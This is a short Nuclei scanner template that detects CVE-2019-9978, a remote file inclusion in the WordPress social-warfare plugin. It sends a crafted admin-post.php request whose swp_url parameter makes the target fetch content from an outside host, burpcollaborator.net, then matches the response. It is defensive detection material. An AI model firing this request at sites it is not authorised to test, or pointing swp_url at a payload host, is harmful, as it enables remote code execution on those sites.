nuclei-templates/cves/CVE-2019-9978.yaml

22 lines
499 B
YAML

id: cve-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
severity: critical
# Reference:- https://github.com/mpgn/CVE-2019-9978
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collabolator Server"
part: body